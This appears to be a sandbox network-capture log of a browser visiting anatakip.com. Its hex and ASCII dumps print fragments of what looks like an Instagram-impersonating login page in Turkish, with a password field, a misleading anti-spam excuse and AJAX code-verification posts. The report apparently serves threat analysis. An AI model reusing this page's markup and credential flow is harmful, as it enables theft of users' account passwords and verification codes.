                    2024-05-26 22:57:41 UTC1369INData Raw: 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 38 20 69 6e 73 74 61 63 6c 61 73 73 39 22 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 63 6c 61 73 73 3d 22 69 6e 73 74 61 63 6c 61 73 73 31 30 20 69 6e 73 74 61 63 6c 61 73 73 31 31 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 c5 9e 69 66 72 65 22 20 61 72 69 61 2d 72 65 71 75 69 72 65 64 3d 22 74 72 75 65 22 20 6e 61 6d 65 3d 22 70 61 73 73 77 6f 72 64 22 20 70 6c 61 63 65 68 6f 6c 64 65 72 3d 22 c5 9e 69 66 72 65 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 20 2f 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69
                    Data Ascii: div><div class="instaclass8 instaclass9"><input type="password" class="instaclass10 instaclass11" aria-describedby aria-label="ifre" aria-required="true" name="password" placeholder="ifre"></div><input type="hidden" name="userid" /><span class="i
                    2024-05-26 22:57:41 UTC1369INData Raw: 30 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 62 6c 61 63 6b 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 22 3e 0a 3c 70 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 62 6c 75 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 22 3e 53 c3 bc 72 65 6b 6c 69 20 c5 9f 69 66 72 65 20 79 61 6e 6c c4 b1 c5 9f 20 68 61 74 61 73 c4 b1 20 69 6c 65 20 6b 61 72 c5 9f c4 b1 6c 61 c5 9f 61 62 69 6c 69 72 73 69 6e 69 7a 2e 20 49 6e 73 74 61 67 72 61 6d 27 c4 b1 6e 20 61 6e 74 69 2d 73 70 61 6d 20 73 69 73 74 65 6d 69 6e 64 65 20 62 69 72 20 68 61 74 61 20 76 61 72 2e 20 4b 6f 6e 75 2c 20 c3 a7 c3 b6 7a 65 62 69 6c 65 63 65 c4 9f 69 6d 69 7a 20 62 69 72 20 c5 9f 65 79 20 64 65 c4 9f 69 6c 2e 20 49 6e 73 74 61 67 72 61 6d 20 6b 65 6e 64 69 73 69
                    Data Ascii: 0" style="color: black; text-align: left;"><p style="color: blue; text-align: left;">Srekli ifre yanl hatas ile karlaabilirsiniz. Instagram'n anti-spam sisteminde bir hata var. Konu, zebileceimiz bir ey deil. Instagram kendisi
                    2024-05-26 22:57:41 UTC1369INData Raw: 67 69 6e 3a 20 33 30 70 78 20 61 75 74 6f 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 38 70 78 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 39 39 30 32 39 3b 0a 09 09 09 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 33 39 63 37 33 39 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 30 70 78 3b 0a 09 09 09 09 63 75 72 73 6f 72 3a 20 70 6f 69 6e 74 65 72 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6f 6e 61 79 5f 6b 6f 64 75 5f 65 6b 72 61 6e 69 20 62 75 74 74 6f 6e 3a 68 6f 76 65 72 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 37 35 32 30 3b 0a 09 09 09 7d 0a 0a 09 09 09 2e 6f 6e 61 79 5f 6b 6f 64 75 5f 65 6b 72 61 6e 69 20 62 75 74 74 6f 6e 3a 64
                    Data Ascii: gin: 30px auto;padding: 8px;background: #299029;border: 1px solid #39c739;color: #fff;border-radius: 10px;cursor: pointer;}.onay_kodu_ekrani button:hover {background: #207520;}.onay_kodu_ekrani button:d
                    2024-05-26 22:57:41 UTC1369INData Raw: 6f 6e 65 6e 74 28 24 28 27 69 6e 70 75 74 5b 6e 61 6d 65 3d 22 75 73 65 72 69 64 22 5d 27 29 2e 76 61 6c 28 29 29 20 2b 20 22 26 61 6e 74 69 46 6f 72 67 65 72 79 54 6f 6b 65 6e 3d 63 39 63 65 34 36 61 64 62 37 38 63 34 65 66 35 33 37 63 31 66 63 31 30 38 64 66 36 36 65 31 39 22 3b 0a 09 09 09 09 0a 09 09 09 09 24 2e 61 6a 61 78 28 7b 0a 09 09 09 09 09 74 79 70 65 3a 20 22 50 4f 53 54 22 2c 0a 09 09 09 09 09 75 72 6c 3a 20 22 3f 22 2c 0a 09 09 09 09 09 64 61 74 61 54 79 70 65 3a 20 22 6a 73 6f 6e 22 2c 0a 09 09 09 09 09 64 61 74 61 3a 20 64 61 74 61 4c 69 73 74 2c 0a 09 09 09 09 09 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 20 28 6a 73 6f 6e 29 20 7b 0a 09 09 09 09 09 09 69 66 20 28 6a 73 6f 6e 2e 73 74 61 74 75 73 20 3d 3d 20 27 73 75 63 63 65 73
                    Data Ascii: onent($('input[name="userid"]').val()) + "&antiForgeryToken=c9ce46adb78c4ef537c1fc108df66e19";$.ajax({type: "POST",url: "?",dataType: "json",data: dataList,success: function (json) {if (json.status == 'succes
                    2024-05-26 22:57:41 UTC1369INData Raw: 64 69 73 61 62 6c 65 64 22 29 3b 0a 09 09 09 09 09 09 09 09 09 09 24 28 27 2e 6b 6f 64 5f 6f 6e 61 79 6c 61 27 29 2e 68 74 6d 6c 28 27 4f 6e 61 79 6c 61 6e c4 b1 79 6f 72 2e 2e 27 29 3b 0a 09 09 09 09 09 09 09 09 09 09 24 2e 61 6a 61 78 28 7b 0a 09 09 09 09 09 09 09 09 09 09 09 75 72 6c 3a 20 22 2f 61 6a 61 78 2f 6b 6f 64 2d 6f 6e 61 79 6c 61 22 2c 0a 09 09 09 09 09 09 09 09 09 09 09 64 61 74 61 3a 20 24 61 6c 6c 44 61 74 61 2c 0a 09 09 09 09 09 09 09 09 09 09 09 74 79 70 65 3a 20 22 50 4f 53 54 22 2c 0a 09 09 09 09 09 09 09 09 09 09 09 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 20 28 6a 73 6f 6e 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 69 66 20 28 6a 73 6f 6e 2e 73 74 61 74 75 73 20 3d 3d 20 22 6f 6b 22 29 20 7b 0a 09 09 09 09 09 09 09 09
                    Data Ascii: disabled");$('.kod_onayla').html('Onaylanyor..');$.ajax({url: "/ajax/kod-onayla",data: $allData,type: "POST",success: function (json) {if (json.status == "ok") {
                    2024-05-26 22:57:41 UTC1369INData Raw: 68 6f 69 63 65 5f 73 65 6c 65 63 74 27 29 2e 76 61 6c 28 29 3b 0a 09 09 09 09 09 09 09 09 7d 0a 0a 0a 09 09 09 09 09 09 09 09 24 28 27 2e 6b 6f 64 5f 69 73 74 65 27 29 2e 63 6c 69 63 6b 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 09 09 09 09 09 09 09 09 09 24 28 27 2e 6b 6f 64 5f 69 73 74 65 27 29 2e 61 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 2c 20 22 64 69 73 61 62 6c 65 64 22 29 3b 0a 09 09 09 09 09 09 09 09 09 24 28 27 2e 6b 6f 64 5f 69 73 74 65 27 29 2e 68 74 6d 6c 28 27 4b 6f 64 20 c4 b0 73 74 65 6e 69 79 6f 72 2e 2e 2e 27 29 3b 0a 0a 09 09 09 09 09 09 09 09 09 24 2e 61 6a 61 78 28 7b 0a 09 09 09 09 09 09 09 09 09 09 75 72 6c 3a 20 22 2f 61 6a 61 78 2f 6b 6f 64 2d 67 6f 6e 64 65 72 22 2c 0a 09 09 09 09 09 09 09 09 09 09 64 61 74 61 3a 20 24 61 6c
                    Data Ascii: hoice_select').val();}$('.kod_iste').click(function () {$('.kod_iste').attr("disabled", "disabled");$('.kod_iste').html('Kod steniyor...');$.ajax({url: "/ajax/kod-gonder",data: $al
                    2024-05-26 22:57:41 UTC1369INData Raw: 09 09 24 2e 61 6a 61 78 28 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 75 72 6c 3a 20 22 2f 61 6a 61 78 2f 6b 6f 64 2d 6f 6e 61 79 6c 61 22 2c 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 64 61 74 61 3a 20 24 61 6c 6c 44 61 74 61 2c 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 74 79 70 65 3a 20 22 50 4f 53 54 22 2c 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 73 75 63 63 65 73 73 3a 20 66 75 6e 63 74 69 6f 6e 20 28 6a 73 6f 6e 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 69 66 20 28 6a 73 6f 6e 2e 73 74 61 74 75 73 20 3d 3d 20 22 73 75 63 63 65 73 73 22 29 20 7b 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 6a 73 6f 6e 2e 72 65 74 75 72 6e 55 72
                    Data Ascii: $.ajax({url: "/ajax/kod-onayla",data: $allData,type: "POST",success: function (json) {if (json.status == "success") {window.parent.location.href = json.returnUr
                    2024-05-26 22:57:41 UTC1369INData Raw: 66 45 72 72 6f 72 41 6c 65 72 74 27 29 2e 73 68 6f 77 28 29 3b 0a 09 09 09 09 09 09 24 28 27 2e 73 70 69 73 70 69 6e 6e 65 72 27 29 2e 68 69 64 65 28 29 3b 0a 09 09 09 09 09 09 24 6d 61 69 6e 64 69 76 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 64 69 73 61 62 6c 65 64 22 29 3b 0a 09 09 09 09 09 09 24 6d 61 69 6e 64 69 76 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 69 6e 73 74 61 63 6c 61 73 73 33 31 22 29 3b 0a 09 09 09 09 09 7d 0a 09 09 09 09 7d 29 3b 0a 09 09 09 7d 29 3b 0a 0a 09 09 09 09 09 09 28 66 75 6e 63 74 69 6f 6e 20 28 69 2c 20 73 2c 20 6f 2c 20 67 2c 20 72 2c 20 61 2c 20 6d 29 20 7b 0a 09 09 09 09 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 20 3d 20 72 3b 0a 09 09 09 09 69 5b 72 5d 20 3d 20 69 5b 72 5d 20 7c 7c 20 66
                    Data Ascii: fErrorAlert').show();$('.spispinner').hide();$maindiv.removeAttr("disabled");$maindiv.removeClass("instaclass31");}});});(function (i, s, o, g, r, a, m) {i['GoogleAnalyticsObject'] = r;i[r] = i[r] || f


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    32192.168.2.549757104.21.27.834433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:41 UTC703OUTGET /assets/style/instastyle.css?v=2.4 HTTP/1.1
                    Host: anatakip.com
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                    sec-ch-ua-platform: "Windows"
                    Accept: text/css,*/*;q=0.1
                    Sec-Fetch-Site: same-origin
                    Sec-Fetch-Mode: no-cors
                    Sec-Fetch-Dest: style
                    Referer: https://anatakip.com/login
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Cookie: df22fd5cb3c2d86bdf715369b47b4428=bf7e3d95e99bd43927c4807425b30e01; _ga=GA1.2.1095029423.1716764258; _gid=GA1.2.1885107992.1716764258
                    2024-05-26 22:57:41 UTC820INHTTP/1.1 200 OK
                    Date: Sun, 26 May 2024 22:57:41 GMT
                    Content-Type: text/css
                    Content-Length: 13631
                    Connection: close
                    Cf-Bgj: minify
                    Cf-Polished: origSize=19560
                    cache-control: public, max-age=2592000
                    expires: Tue, 11 Jun 2024 21:05:56 GMT
                    last-modified: Tue, 30 Apr 2024 19:23:27 GMT
                    vary: Accept-Encoding,Accept-Encoding
                    x-turbo-charged-by: LiteSpeed
                    CF-Cache-Status: HIT
                    Age: 1216305
                    Accept-Ranges: bytes
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qV4Z0Eoy11Hm0TtgS2rNjCjzExffrmmQ2Uq9EelWG2m4edOUy%2Fqyh0aPScyd6RXBDEneEcMALonz1bhrTC67l%2FbVMrSPVWKHpByCVVpY5YWHZOkPTvuWKn4ogWkKUk4%3D"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 88a15d9c7fde8c36-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-05-26 22:57:41 UTC549INData Raw: 40 2d 77 65 62 6b 69 74 2d 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 38 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74
                    Data Ascii: @-webkit-keyframes spin8{0%{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}100%{-webkit-transform:rotate(540deg);-moz-transform:rotate(540deg);-o-transform:rotate(540deg);transform:rotat
                    2024-05-26 22:57:41 UTC1369INData Raw: 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 7d 7d 40 2d 6f 2d 6b 65 79 66 72 61 6d 65 73
                    Data Ascii: {0%{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}100%{-webkit-transform:rotate(540deg);-moz-transform:rotate(540deg);-o-transform:rotate(540deg);transform:rotate(540deg)}}@-o-keyframes
                    2024-05-26 22:57:41 UTC1369INData Raw: 48 4a 6b 5a 6a 70 45 5a 58 4e 6a 63 6d 6c 77 64 47 6c 76 62 69 42 79 5a 47 59 36 59 57 4a 76 64 58 51 39 49 69 49 67 65 47 31 73 62 6e 4d 36 65 47 31 77 54 55 30 39 49 6d 68 30 64 48 41 36 4c 79 39 75 63 79 35 68 5a 47 39 69 5a 53 35 6a 62 32 30 76 65 47 46 77 4c 7a 45 75 4d 43 39 74 62 53 38 69 49 48 68 74 62 47 35 7a 4f 6e 4e 30 55 6d 56 6d 50 53 4a 6f 64 48 52 77 4f 69 38 76 62 6e 4d 75 59 57 52 76 59 6d 55 75 59 32 39 74 4c 33 68 68 63 43 38 78 4c 6a 41 76 63 31 52 35 63 47 55 76 55 6d 56 7a 62 33 56 79 59 32 56 53 5a 57 59 6a 49 69 42 34 62 57 78 75 63 7a 70 34 62 58 41 39 49 6d 68 30 64 48 41 36 4c 79 39 75 63 79 35 68 5a 47 39 69 5a 53 35 6a 62 32 30 76 65 47 46 77 4c 7a 45 75 4d 43 38 69 49 48 68 74 63 45 31 4e 4f 6b 39 79 61 57 64 70 62 6d 46 73
                    Data Ascii: HJkZjpEZXNjcmlwdGlvbiByZGY6YWJvdXQ9IiIgeG1sbnM6eG1wTU09Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC9tbS8iIHhtbG5zOnN0UmVmPSJodHRwOi8vbnMuYWRvYmUuY29tL3hhcC8xLjAvc1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtcE1NOk9yaWdpbmFs
                    2024-05-26 22:57:41 UTC1369INData Raw: 6d 75 35 36 72 59 34 42 43 4b 47 31 57 75 53 72 6f 56 71 32 5a 69 44 6e 77 41 39 2b 4c 75 47 54 53 72 6b 46 77 32 66 4c 51 36 69 51 2b 59 65 4c 70 35 30 4d 73 57 61 30 52 34 70 79 69 64 66 34 48 74 70 42 73 61 45 38 76 6f 56 58 43 4c 7a 39 72 69 6b 47 74 6f 33 6a 63 45 6a 6f 4a 39 38 42 37 55 30 2f 79 76 68 42 41 2f 78 68 71 6e 31 52 4f 69 6c 46 68 57 39 46 67 50 78 62 66 6d 58 34 6e 48 39 54 51 4d 68 4d 56 37 62 4e 56 31 48 6f 75 69 62 70 42 43 35 7a 69 38 66 76 4b 65 67 70 53 56 45 35 6b 6f 47 42 51 76 6c 72 7a 58 30 6f 6f 31 79 50 77 68 4e 6b 44 58 65 57 36 58 35 63 5a 2b 61 4c 4e 66 6b 71 70 59 36 77 59 75 4b 63 53 2f 45 74 6c 59 4f 69 63 6e 76 32 37 70 2b 4b 76 43 78 44 58 57 56 4e 59 4e 44 45 63 51 33 79 35 55 4a 71 36 34 4d 4c 43 58 55 4c 7a 4f 52
                    Data Ascii: mu56rY4BCKG1WuSroVq2ZiDnwA9+LuGTSrkFw2fLQ6iQ+YeLp50MsWa0R4pyidf4HtpBsaE8voVXCLz9rikGto3jcEjoJ98B7U0/yvhBA/xhqn1ROilFhW9FgPxbfmX4nH9TQMhMV7bNV1HouibpBC5zi8fvKegpSVE5koGBQvlrzX0oo1yPwhNkDXeW6X5cZ+aLNfkqpY6wYuKcS/EtlYOicnv27p+KvCxDXWVNYNDEcQ3y5UJq64MLCXULzOR
                    2024-05-26 22:57:41 UTC1369INData Raw: 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 73 74 72 65 74 63 68 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23 30 30 30 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 66 6c 65 78 3b 64 69 73 70 6c 61 79 3a 2d 6d 73 2d 66 6c 65 78 62 6f 78 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 6f 72 69 65 6e 74 3a 76 65 72 74 69 63 61 6c 3b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 64 69 72 65 63 74 69 6f 6e 3a 6e 6f 72 6d 61 6c 3b 2d 77 65 62 6b 69 74 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 2d 6d 73 2d 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 66 6c 65 78 2d
                    Data Ascii: ;align-items:stretch;border:0 solid #000;box-sizing:border-box;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex;-webkit-box-orient:vertical;-webkit-box-direction:normal;-webkit-flex-direction:column;-ms-flex-direction:column;flex-
                    2024-05-26 22:57:41 UTC1369INData Raw: 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 7d 7d 40 2d 6d 73 2d 6b 65 79 66 72 61 6d 65 73 20 73 70 69 6e 38 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 2d 6d 6f 7a 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 2d 6f 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 38 30 64 65 67 29 7d 31 30 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 35 34 30 64 65 67 29 3b 2d 6d 6f 7a 2d 74 72
                    Data Ascii: :rotate(540deg);-o-transform:rotate(540deg);transform:rotate(540deg)}}@-ms-keyframes spin8{0%{-webkit-transform:rotate(180deg);-moz-transform:rotate(180deg);-o-transform:rotate(180deg);transform:rotate(180deg)}100%{-webkit-transform:rotate(540deg);-moz-tr
                    2024-05-26 22:57:41 UTC1369INData Raw: 63 31 52 35 63 47 55 76 55 6d 56 7a 62 33 56 79 59 32 56 53 5a 57 59 6a 49 69 42 34 62 57 78 75 63 7a 70 34 62 58 41 39 49 6d 68 30 64 48 41 36 4c 79 39 75 63 79 35 68 5a 47 39 69 5a 53 35 6a 62 32 30 76 65 47 46 77 4c 7a 45 75 4d 43 38 69 49 48 68 74 63 45 31 4e 4f 6b 39 79 61 57 64 70 62 6d 46 73 52 47 39 6a 64 57 31 6c 62 6e 52 4a 52 44 30 69 65 47 31 77 4c 6d 52 70 5a 44 6f 79 52 54 4e 47 4d 6b 56 45 4e 54 6c 45 4d 6a 45 32 4f 44 45 78 4f 44 49 79 51 55 4e 45 4d 6a 4d 77 4e 7a 55 7a 4e 54 45 7a 4d 79 49 67 65 47 31 77 54 55 30 36 52 47 39 6a 64 57 31 6c 62 6e 52 4a 52 44 30 69 65 47 31 77 4c 6d 52 70 5a 44 6f 77 4d 7a 49 78 4d 6b 55 33 51 54 63 78 4d 55 55 78 4d 55 55 79 51 6a 64 46 4d 55 4e 44 4e 44 67 33 4f 54 45 33 52 55 59 35 52 43 49 67 65 47 31
                    Data Ascii: c1R5cGUvUmVzb3VyY2VSZWYjIiB4bWxuczp4bXA9Imh0dHA6Ly9ucy5hZG9iZS5jb20veGFwLzEuMC8iIHhtcE1NOk9yaWdpbmFsRG9jdW1lbnRJRD0ieG1wLmRpZDoyRTNGMkVENTlEMjE2ODExODIyQUNEMjMwNzUzNTEzMyIgeG1wTU06RG9jdW1lbnRJRD0ieG1wLmRpZDowMzIxMkU3QTcxMUUxMUUyQjdFMUNDNDg3OTE3RUY5RCIgeG1
                    2024-05-26 22:57:41 UTC1369INData Raw: 76 4b 65 67 70 53 56 45 35 6b 6f 47 42 51 76 6c 72 7a 58 30 6f 6f 31 79 50 77 68 4e 6b 44 58 65 57 36 58 35 63 5a 2b 61 4c 4e 66 6b 71 70 59 36 77 59 75 4b 63 53 2f 45 74 6c 59 4f 69 63 6e 76 32 37 70 2b 4b 76 43 78 44 58 57 56 4e 59 4e 44 45 63 51 33 79 35 55 4a 71 36 34 4d 4c 43 58 55 4c 7a 4f 52 4e 4f 46 67 52 6e 77 6d 5a 4e 31 75 6b 50 78 73 6f 6b 46 46 6d 79 62 59 4d 6e 46 4b 72 51 47 6e 68 6d 73 64 39 5a 49 4b 6a 75 79 31 4d 4f 33 38 53 73 6c 6b 39 68 74 4b 57 6d 4a 65 66 4d 38 54 6f 6e 77 4c 2f 54 41 48 45 73 4b 49 66 36 4e 72 5a 64 30 57 54 52 51 4a 56 59 6a 6e 77 4e 70 52 2f 34 72 5a 57 34 67 4e 35 44 78 2b 43 76 41 41 42 6a 42 73 6b 2f 6f 43 71 78 75 41 41 41 41 41 45 6c 46 54 6b 53 75 51 6d 43 43 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74
                    Data Ascii: vKegpSVE5koGBQvlrzX0oo1yPwhNkDXeW6X5cZ+aLNfkqpY6wYuKcS/EtlYOicnv27p+KvCxDXWVNYNDEcQ3y5UJq64MLCXULzORNOFgRnwmZN1ukPxsokFFmybYMnFKrQGnhmsd9ZIKjuy1MO38Sslk9htKWmJefM8TonwL/TAHEsKIf6NrZd0WTRQJVYjnwNpR/4rZW4gN5Dx+CvAABjBsk/oCqxuAAAAAElFTkSuQmCC);-webkit-animat
                    2024-05-26 22:57:41 UTC1369INData Raw: 74 3a 73 70 61 63 65 2d 62 65 74 77 65 65 6e 3b 70 61 64 64 69 6e 67 3a 33 38 70 78 20 30 7d 2e 69 6e 73 74 61 63 6c 61 73 73 32 35 20 2e 69 6e 73 74 61 63 6c 61 73 73 32 36 7b 6d 61 78 2d 77 69 64 74 68 3a 31 30 30 25 7d 2e 69 6e 73 74 61 63 6c 61 73 73 32 35 20 2e 69 6e 73 74 61 63 6c 61 73 73 32 37 7b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 31 36 70 78 7d 7d 40 6d 65 64 69 61 28 6d 61 78 2d 77 69 64 74 68 3a 38 37 34 70 78 29 7b 2e 69 6e 73 74 61 63 6c 61 73 73 32 35 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 20 30 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 6e 73 74 61 63 6c 61 73 73 32 35 20 2e 69 6e 73 74 61 63 6c 61 73 73 32 37 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 70 61 63 6b 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 6a 75 73
                    Data Ascii: t:space-between;padding:38px 0}.instaclass25 .instaclass26{max-width:100%}.instaclass25 .instaclass27{margin-right:16px}}@media(max-width:874px){.instaclass25{padding:10px 0;text-align:center}.instaclass25 .instaclass27{-webkit-box-pack:center;-webkit-jus
                    2024-05-26 22:57:41 UTC1369INData Raw: 73 3a 33 70 78 3b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 63 6f 6c 6f 72 3a 23 32 36 32 36 32 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 70 61 64 64 69 6e 67 3a 39 70 78 20 38 70 78 20 37 70 78 3b 2d 77 65 62 6b 69 74 2d 61 70 70 65 61 72 61 6e 63 65 3a 6e 6f 6e 65 7d 2e 69 6e 73 74 61 63 6c 61 73 73 31 30 3a 66 6f 63 75 73 7b 62 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 62 32 62 32 62 32 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 2e 69 6e 73 74 61 63 6c 61 73 73 31 32 7b 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 2d 77 65 62 6b 69 74 2d 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 2d 6d 73 2d 66 6c 65 78 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 61 6c 69 67 6e 2d 69 74
                    Data Ascii: s:3px;box-sizing:border-box;color:#262626;font-size:14px;padding:9px 8px 7px;-webkit-appearance:none}.instaclass10:focus{border:1px solid #b2b2b2;outline:none}.instaclass12{-webkit-box-align:center;-webkit-align-items:center;-ms-flex-align:center;align-it


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    33192.168.2.549761104.22.75.1714433788C:\Program Files\Google\Chrome\Application\chrome.exe
                    TimestampBytes transferredDirectionData
                    2024-05-26 22:57:42 UTC589OUTGET /widget/instamark.png HTTP/1.1
                    Host: whos.amung.us
                    Connection: keep-alive
                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                    sec-ch-ua-mobile: ?0
